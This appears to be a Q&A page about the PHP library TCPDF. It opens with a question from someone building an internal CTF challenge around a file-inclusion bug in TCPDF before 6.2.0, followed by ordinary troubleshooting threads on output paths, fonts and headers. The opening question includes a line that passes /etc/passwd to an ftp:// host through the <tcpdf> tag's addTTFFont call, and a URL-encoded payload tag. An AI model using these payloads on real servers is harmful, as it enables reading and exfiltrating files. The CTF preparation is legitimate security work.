I am making some challenges as part of an internal CTF that we are hosting. As part of the challenges, one of the things that I was planning on giving out was File Inclusion using a vulnerability in a certain version of TCPDF.
I was trying to follow the blog here to get an understanding of the bug itself:
File inclusion through broken TCPDF
I do understand the vulnerability in a nutshell, which is, that TCPDF, by default, has access to a special tag <tcpdf /> which allows execution of available TCPDF methods along with parameters.
So for example if :
<tcpdf method="some_method" params="abcd"/>
the above is passed to the writeHTML() TCPDF would call some_method() with the params abcd.
And to be able to read files, a specific TCPDF method called addTTFFont is going to be used which takes as params the following:
$fontfile – The file to grab from the server. Any readable file can
be selected.
$fonttype – Needs to be set to TrueType for the attack to work.
$outpath – Location for the output for the file.
By injecting a ftp-location, as the 3rd param, the file will be uploaded remotely.
Please correct me if my understanding is incorrect here.
Now, here's what I do not understand from the blog above. The line that says:
By generating a tcpdf-element using the following code:
$params = TCPDF_STATIC::serializeTCPDFtagParameters(array('/etc/passwd','TrueType','',255,urldecode('ftp://user:pass#host/')));
Now what is the author trying to explain in the above line ?
Also to be able to reproduce this vulnerability, here's what I tried :
Hosted a very simple (and of course vulnerable in many ways) app on my local Aapache server and used TCPDF V 6.1.1 as this was the version immediately before 6.2.0 in which the bug was patched.
The app simply allows users to register and login. On login user gets a page as and on clicking on the link in red, a PDF file is generated for the user with his name as :
where gogo was the user name.
Now below is the code that generates the PDF (gen_pdf.php):
<?php
session_start();
require_once('tcpdf_include.php');
if (isset($_SESSION['username'])){
// Extend the TCPDF class to create custom Header and Footer
class MYPDF extends TCPDF {
//Page header
public function Header() {
// Logo
$image_file = K_PATH_IMAGES.'logo_example.jpg';
$this->Image($image_file, 10, 10, 15, '', 'JPG', '', 'T', false, 300, '', false, false, 0, false, false, false);
// Set font
$this->SetFont('helvetica', 'B', 20);
// Title to right allignment
$this->Cell(0, 15, '<< The Machine v/s Samaritan >>', 1, false, '', 0, '', 0, false, 'T', 'M');
}
}
$pdf = new MYPDF(PDF_PAGE_ORIENTATION, PDF_UNIT, PDF_PAGE_FORMAT, true, 'UTF-8', false);
$pdf->SetCreator(PDF_CREATOR);
$pdf->SetAuthor('John Reese');
$pdf->SetTitle('The Machine Must Live');
$pdf->SetSubject('The future is inevitable. ');
$pdf->SetKeywords('The Machine, Samaritan, Mr. Reese');
// set default header data
$pdf->SetHeaderData(PDF_HEADER_LOGO, PDF_HEADER_LOGO_WIDTH, PDF_HEADER_TITLE.' 001', PDF_HEADER_STRING, array(0,64,255), array(0,64,128));
$pdf->setFooterData(array(0,64,0), array(0,64,128));
// set header and footer fonts
$pdf->setHeaderFont(Array(PDF_FONT_NAME_MAIN, '', PDF_FONT_SIZE_MAIN));
$pdf->setFooterFont(Array(PDF_FONT_NAME_DATA, '', PDF_FONT_SIZE_DATA));
// set default monospaced font
$pdf->SetDefaultMonospacedFont(PDF_FONT_MONOSPACED);
// set margins
$pdf->SetMargins(PDF_MARGIN_LEFT, PDF_MARGIN_TOP, PDF_MARGIN_RIGHT);
$pdf->SetHeaderMargin(PDF_MARGIN_HEADER);
$pdf->SetFooterMargin(PDF_MARGIN_FOOTER);
// set auto page breaks
$pdf->SetAutoPageBreak(TRUE, PDF_MARGIN_BOTTOM);
// set image scale factor
$pdf->setImageScale(PDF_IMAGE_SCALE_RATIO);
// set some language-dependent strings (optional)
if (#file_exists(dirname(__FILE__).'/lang/eng.php')) {
require_once(dirname(__FILE__).'/lang/eng.php');
$pdf->setLanguageArray($l);
}
// ---------------------------------------------------------
// set default font subsetting mode
$pdf->setFontSubsetting(true);
// Set font
// dejavusans is a UTF-8 Unicode font, if you only need to
// print standard ASCII chars, you can use core fonts like
// helvetica or times to reduce file size.
$pdf->SetFont('dejavusans', '', 14, '', true);
// set text shadow effect
$pdf->setTextShadow(array('enabled'=>true, 'depth_w'=>0.2, 'depth_h'=>0.2, 'color'=>array(196,196,196), 'opacity'=>1, 'blend_mode'=>'Normal'));
// Set some content to print
$html = <<<EOD
<div>
<h1>Welcome to Tomorrow !!<span style="color:black;"></span></h1>
<i>This Machine is growing weaker and we need to keep it safe.</i>
<p>This is the world of the <i>Samaritan</i> and it needs to be protected <i>Mr. Rees and Root will be there for your help</i>.</p>
<p>All the best for your travel ... </p>
</div>
EOD;
$pdf->AddPage('P');
$html = $html."<div><h2>".$_SESSION['username']."</h2></div>";
$pdf->writeHTML($html);
ob_end_clean();
$pdf->Output('ticket_to_the_future.pdf', 'I');
}
?>
I modified just this part of the above code :
$pdf->AddPage('P');
$html = $html."<div><h2>".$_SESSION['username']."</h2></div>";
$pdf->writeHTML($html);
ob_end_clean();
$pdf->Output('ticket_to_the_future.pdf', 'I');
to this:
$pdf->AddPage('P');
$html = "<tcpdf method=\"addTTFFont\" params=\"%5B%22CHANGELOG.TXT%22%2C%22TrueType%22%2C%22%22%2C255%2C%22%5C%2Ftmp%5C%2Ftcpdf_bug.txt%22%5D\"/>";
$pdf->writeHTML($html);
ob_end_clean();
$pdf->Output('ticket_to_the_future.pdf', 'I');
that is hardcoded the exploit payload (just to check if things are working), where CHANGELOG.TXT is a file already present in the same directory as gen_pdf.php
Output
No tcpdf_bug.txt file seems to be getting generated in \tmp.
What am I doing wrong here ? Please help me create this PoC.
Related
I created a plugin where when you press send, the data in the form should be translated to pdf and saved in a folder for backup purposes.
I'm using the tcpdf api, downloaded the library and put it in my plugin folder. as i try to test it with the givin textexample from the tcpdf site, it just throws up thses errors:
"Warning: "continue" targeting switch is equivalent to "break". Did
you mean to use "continue 2"? in
/www/htdocs/w00e68de/msp.rfid-dresden.de/wp-content/plugins/wp-markenbuero/tcpdf/tcpdf.php
on line 17778
Warning: fopen(): remote host file access not supported,
file://example_002.pdf in
/www/htdocs/w00e68de/msp.rfid-dresden.de/wp-content/plugins/wp-markenbuero/tcpdf/include/tcpdf_static.php
on line 1854
Warning: fopen(file://example_002.pdf): failed to open stream: no
suitable wrapper could be found in
/www/htdocs/w00e68de/msp.rfid-dresden.de/wp-content/plugins/wp-markenbuero/tcpdf/include/tcpdf_static.php
on line 1854 TCPDF ERROR: Unable to create output file:
example_002.pdf"
// Include the main TCPDF library (search for installation path).
require_once('tcpdf/tcpdf.php');
// create new PDF document
$pdf = new TCPDF(PDF_PAGE_ORIENTATION, PDF_UNIT, PDF_PAGE_FORMAT, true, 'UTF-8', false);
// set document information
$pdf->SetCreator(PDF_CREATOR);
$pdf->SetAuthor('Nicola Asuni');
$pdf->SetTitle('TCPDF Example 002');
$pdf->SetSubject('TCPDF Tutorial');
$pdf->SetKeywords('TCPDF, PDF, example, test, guide');
// remove default header/footer
$pdf->setPrintHeader(false);
$pdf->setPrintFooter(false);
// set default monospaced font
$pdf->SetDefaultMonospacedFont(PDF_FONT_MONOSPACED);
// set margins
$pdf->SetMargins(PDF_MARGIN_LEFT, PDF_MARGIN_TOP, PDF_MARGIN_RIGHT);
// set auto page breaks
$pdf->SetAutoPageBreak(TRUE, PDF_MARGIN_BOTTOM);
// set image scale factor
$pdf->setImageScale(PDF_IMAGE_SCALE_RATIO);
// set some language-dependent strings (optional)
if (#file_exists(dirname(__FILE__).'/lang/eng.php')) {
require_once(dirname(__FILE__).'/lang/eng.php');
$pdf->setLanguageArray($l);
}
// ---------------------------------------------------------
// set font
$pdf->SetFont('times', 'BI', 20);
// add a page
$pdf->AddPage();
// set some text to print
$txt = <<<EOD
TCPDF Example 002
Default page header and footer are disabled using setPrintHeader() and setPrintFooter() methods.
EOD;
// print a block of text using Write()
$pdf->Write(0, $txt, '', 0, 'C', true, 0, false, false, 0);
// ---------------------------------------------------------
//Close and output PDF document
$pdf->Output('example_002.pdf', 'F');
}
?>
There's two parts to this, so I'll split my answer between the two:
File Protocol Warning / Failure to Generate PDF:
You cannot use relative file paths when calling Output in F mode to save to a local file. You must provide a full file path. Here are some examples:
//Generates output file in the same folder as current script.
$pdf->Output(dirname(__FILE__).'/example_002.pdf', 'F');
or
//Save to the document root.
$pdf->Output($_SERVER['DOCUMENT_ROOT'].'/example_002.pdf', 'F');
Continue Targeting Switch Warning:
This warning is a PHP 7.3 incompatibility warning with whichever version of the TCPDF library you are using. The master branch from the github repo doesn't appear to throw this warning, so try using that version of the library.
I have a PHP project in which I use TCPDF. I had a PHP File which creates an HTML theme with bootstrap. Inside this file I include my pdfGeneration.php. It looks like that:
require_once('tcpdf/tcpdf.php');
$pdfAuthor = "Test";
$pdfName = "Test.pdf";
$pdf = new TCPDF(PDF_PAGE_ORIENTATION, PDF_UNIT, PDF_PAGE_FORMAT, true, 'UTF-8', false);
$pdf->SetCreator(PDF_CREATOR);
$pdf->SetAuthor($pdfAuthor);
$pdf->SetTitle($pdfName);
$pdf->SetSubject($pdfName);
$pdf->setHeaderFont(Array(PDF_FONT_NAME_MAIN, '', PDF_FONT_SIZE_MAIN));
$pdf->setFooterFont(Array(PDF_FONT_NAME_DATA, '', PDF_FONT_SIZE_DATA));
$pdf->SetDefaultMonospacedFont(PDF_FONT_MONOSPACED);
$pdf->SetMargins(PDF_MARGIN_LEFT, PDF_MARGIN_TOP, PDF_MARGIN_RIGHT);
$pdf->SetHeaderMargin(PDF_MARGIN_HEADER);
$pdf->SetFooterMargin(PDF_MARGIN_FOOTER);
$pdf->SetAutoPageBreak(TRUE, PDF_MARGIN_BOTTOM);
$pdf->setImageScale(PDF_IMAGE_SCALE_RATIO);
$pdf->SetFont('dejavusans', '', 10);
$pdf->AddPage();
$htmlContent = 'Test';
$pdf->writeHTML($htmlContent, true, false, true, false, '');
ob_end_clean();
$outputFile = 'myServerPathHere';
$pdf->Output($outputFile, 'F');
echo '<span>PDF Creation finished. <a href="' . $outputFilePath . pdfName'" target='blank'>You can download the file here</a></span>';
If I don't include this pdfGeneration everything works fine. But when I include it I got only a blank white site with that span in it as a result. The rest of the HTML code that is located inside the file that includes the pdfGeneration is totally lost. I can't find an error?!
My goal is a site where the pdf is generated and in the best case, the pdf is directly opened in a new tab. I don't find a solution for that so I solved it with the link. But my first problem is the missing HTML.
Excuse my question, I found the error myself. The function "ob_end_clean(); " is the error. PHP Docs: ob_end_clean - Clean (erase) the output buffer and turn off output buffering. This probably causes the entire previously generated HTML code to be lost. If I remove the command it works.
I have a script taken from TCPDF examples I am trying to out put it to another folder but I am unable to. I have tried searching stackoverflow and have used the examples here but it doesnt seem to work for me. I have also tried it on my server and still the same error. I have tried placing the folder in the TCPDF folder also to see if it was path issue.
below is a the sample from Their website
<?php
require_once('tcpdf_include.php');
// create new PDF document
$pdf = new TCPDF(PDF_PAGE_ORIENTATION, PDF_UNIT, PDF_PAGE_FORMAT, true, 'UTF-8', false);
// set document information
$pdf->SetCreator(PDF_CREATOR);
$pdf->SetAuthor('Nicola Asuni');
$pdf->SetTitle('TCPDF Example 001');
$pdf->SetSubject('TCPDF Tutorial');
$pdf->SetKeywords('TCPDF, PDF, example, test, guide');
// set default header data
$pdf->SetHeaderData(PDF_HEADER_LOGO, PDF_HEADER_LOGO_WIDTH, PDF_HEADER_TITLE.' 001', PDF_HEADER_STRING, array(0,64,255), array(0,64,128));
$pdf->setFooterData(array(0,64,0), array(0,64,128));
// set header and footer fonts
$pdf->setHeaderFont(Array(PDF_FONT_NAME_MAIN, '', PDF_FONT_SIZE_MAIN));
$pdf->setFooterFont(Array(PDF_FONT_NAME_DATA, '', PDF_FONT_SIZE_DATA));
// set default monospaced font
$pdf->SetDefaultMonospacedFont(PDF_FONT_MONOSPACED);
// set margins
$pdf->SetMargins(PDF_MARGIN_LEFT, PDF_MARGIN_TOP, PDF_MARGIN_RIGHT);
$pdf->SetHeaderMargin(PDF_MARGIN_HEADER);
$pdf->SetFooterMargin(PDF_MARGIN_FOOTER);
// set auto page breaks
$pdf->SetAutoPageBreak(TRUE, PDF_MARGIN_BOTTOM);
// set image scale factor
$pdf->setImageScale(PDF_IMAGE_SCALE_RATIO);
// set some language-dependent strings (optional)
if (#file_exists(dirname(__FILE__).'/lang/eng.php')) {
require_once(dirname(__FILE__).'/lang/eng.php');
$pdf->setLanguageArray($l);
}
// ---------------------------------------------------------
// set default font subsetting mode
$pdf->setFontSubsetting(true);
// Set font
// dejavusans is a UTF-8 Unicode font, if you only need to
// print standard ASCII chars, you can use core fonts like
// helvetica or times to reduce file size.
$pdf->SetFont('dejavusans', '', 14, '', true);
// Add a page
// This method has several options, check the source code documentation for more information.
$pdf->AddPage();
// set text shadow effect
$pdf->setTextShadow(array('enabled'=>true, 'depth_w'=>0.2, 'depth_h'=>0.2, 'color'=>array(196,196,196), 'opacity'=>1, 'blend_mode'=>'Normal'));
// Set some content to print
$pdf->Output('TestFolder/example_001.pdf', 'F');
?>
TCPDF ERROR: Unable to create output file:
Sounds like a simple rights issue to me.
Does the output folder exist?
Does your web server run as a different user to the folder where the site is hosted?
To provide a real solution, you need to provide more information about your web-server setup. Which web server do you use? Can you log in via a terminal?
I had rights issues too, after I installed TCPDF via composer. It still causes me issues every time I set set up new development environments.
TCPDF tries to write to its installation folder during execution. If that folder is not writable by your webserver, TCPDF will die.
Try:
su
chmod -R g+w vendor/tcpdf
chown -R owner:apache vendor/tcpdf
Substituting, of course, the folder, owner and apache values with the real values from your server.
make sure that your file('TestFolder/example_001.pdf') is not open anywhere when you run script. if it's open somewhere else then TCPDF can't open it.
I set up the main path for tcpdf like this:
define ('K_PATH_MAIN', '/MAMP/htdocs/tcpdf/');
and the url path like this:
define ('K_PATH_URL', 'http://localhost:8888/tcpdf/');
I'm using MAMP in mac. I'm receiving the follow error:
TCPDF ERROR: Could not include font definition file: helvetica
Looks like that the main path is wrong after all attempts I need help to put it right.
This is the follow code using, but the code is the example from tcpdf:
require_once('../config/lang/eng.php');
require_once('../tcpdf.php');
// create new PDF document
$pdf = new TCPDF(PDF_PAGE_ORIENTATION, PDF_UNIT, PDF_PAGE_FORMAT, true, 'UTF-8', false);
// set document information
$pdf->SetCreator(PDF_CREATOR);
$pdf->SetAuthor('Nicola Asuni');
$pdf->SetTitle('TCPDF Example 001');
$pdf->SetSubject('TCPDF Tutorial');
$pdf->SetKeywords('TCPDF, PDF, example, test, guide');
// set default header data
$pdf->SetHeaderData(PDF_HEADER_LOGO, PDF_HEADER_LOGO_WIDTH, PDF_HEADER_TITLE.' 001', PDF_HEADER_STRING);
// set header and footer fonts
$pdf->setHeaderFont(Array(PDF_FONT_NAME_MAIN, '', PDF_FONT_SIZE_MAIN));
$pdf->setFooterFont(Array(PDF_FONT_NAME_DATA, '', PDF_FONT_SIZE_DATA));
// set default monospaced font
$pdf->SetDefaultMonospacedFont(PDF_FONT_MONOSPACED);
//set margins
$pdf->SetMargins(PDF_MARGIN_LEFT, PDF_MARGIN_TOP, PDF_MARGIN_RIGHT);
$pdf->SetHeaderMargin(PDF_MARGIN_HEADER);
$pdf->SetFooterMargin(PDF_MARGIN_FOOTER);
//set auto page breaks
$pdf->SetAutoPageBreak(TRUE, PDF_MARGIN_BOTTOM);
//set image scale factor
$pdf->setImageScale(PDF_IMAGE_SCALE_RATIO);
//set some language-dependent strings
$pdf->setLanguageArray($l);
// ---------------------------------------------------------
// set default font subsetting mode
$pdf->setFontSubsetting(true);
// Set font
// dejavusans is a UTF-8 Unicode font, if you only need to
// print standard ASCII chars, you can use core fonts like
// helvetica or times to reduce file size.
$pdf->SetFont('dejavusans', '', 14, '', true);
// Add a page
// This method has several options, check the source code documentation for more information.
$pdf->AddPage();
// Set some content to print
$html = <<<EOD
<h1>Welcome to <span style="color:black;">TC</span><span style="color:white;">PDF</span> !</h1>
<i>This is the first example of TCPDF library.</i>
<p>This text is printed using the <i>writeHTMLCell()</i> method but you can also use: <i>Multicell(), writeHTML(), Write(), Cell() and Text()</i>.</p>
<p>Please check the source code documentation and other examples for further information.</p>
<p style="color:#CC0000;">TO IMPROVE AND EXPAND TCPDF I NEED YOUR SUPPORT, PLEASE MAKE A DONATION!</p>
EOD;
// Print text using writeHTMLCell()
$pdf->writeHTMLCell($w=0, $h=0, $x='', $y='', $html, $border=0, $ln=1, $fill=0, $reseth=true, $align='', $autopadding=true);
// ---------------------------------------------------------
// Close and output PDF document
// This method has several options, check the source code documentation for more information.
$pdf->Output('example_001.pdf', 'I');
Use this code in php
define ('K_PATH_FONTS',dirname(__FILE__).'/../fonts/');
I have been using TCPDF for sometime. It's simple to use, outputs low size PDF and is under active development.
Following is the code for a page which should only have Hello World and a footer showing page number. However I get an additional Horizontal Line at the top of the page.It's bugging me. How do I get rid of it?
<?php
require_once('config/lang/eng.php');
require_once('tcpdf.php');
// create new PDF document
$pdf = new TCPDF(PDF_PAGE_ORIENTATION, PDF_UNIT, PDF_PAGE_FORMAT, true, 'UTF-8', false);
// set document information
$pdf->SetCreator(PDF_CREATOR);
// set default header data
// set header and footer fonts
$pdf->setHeaderFont(Array(PDF_FONT_NAME_MAIN, '', PDF_FONT_SIZE_MAIN));
$pdf->setFooterFont(Array(PDF_FONT_NAME_DATA, '', PDF_FONT_SIZE_DATA));
// set default monospaced font
$pdf->SetDefaultMonospacedFont(PDF_FONT_MONOSPACED);
//set margins
//$pdf->SetMargins(PDF_MARGIN_LEFT, PDF_MARGIN_TOP, PDF_MARGIN_RIGHT);
//$pdf->SetHeaderMargin(PDF_MARGIN_HEADER);
$pdf->SetFooterMargin(PDF_MARGIN_FOOTER);//if i comment this out the lower line disappears
//set auto page breaks
$pdf->SetAutoPageBreak(TRUE, PDF_MARGIN_BOTTOM);
//set image scale factor
//$pdf->setImageScale(PDF_IMAGE_SCALE_RATIO);
//set some language-dependent strings
$pdf->setLanguageArray($l);
// ---------------------------------------------------------
// set font
$pdf->SetFont('helvetica', '', 10);
// add a page
$pdf->AddPage();
// define some HTML content with style
$html = <<<EOF
Hello World
EOF;
// output the HTML content
$pdf->writeHTML($html, true, false, true, false, '');
// reset pointer to the last page
$pdf->lastPage();
// ---------------------------------------------------------
//Close and output PDF document
$pdf->Output('example_061.pdf', 'I');
?>
Solution:
$pdf->SetPrintHeader(false);
$pdf->SetPrintFooter(false);
Changing or eliminating Header & Footer in TCPDF
just do this $pdf->setPrintHeader(false); and the line at the top will go away
The horizontal line is defined on the default Header().
You can either override the Header() method as on example n. 3 or disable the header as on the example n. 2.
Check the TCPDF website at http://www.tcpdf.org and consult the official forum for further information.
In case this is not solved for anyone else here and they are using FPDI to import a template, try looking at the calculated page height from FPDI and the resultant page height from TCPDF. For me they did not match, and to get rid of the black line I had to add 8 to the page height, and subtract 7 from the y-ordinate value in the useTemplate function in addition to setPrintHeader(false), like this:
$tplidx = $pdf->ImportPage($i);
$s = $pdf->getTemplateSize($tplidx);
// TCPDF STUFF, AddPage(), etc.
$pdf->useTemplate($tplidx,0,-7,$s['w'],$s['h']+8);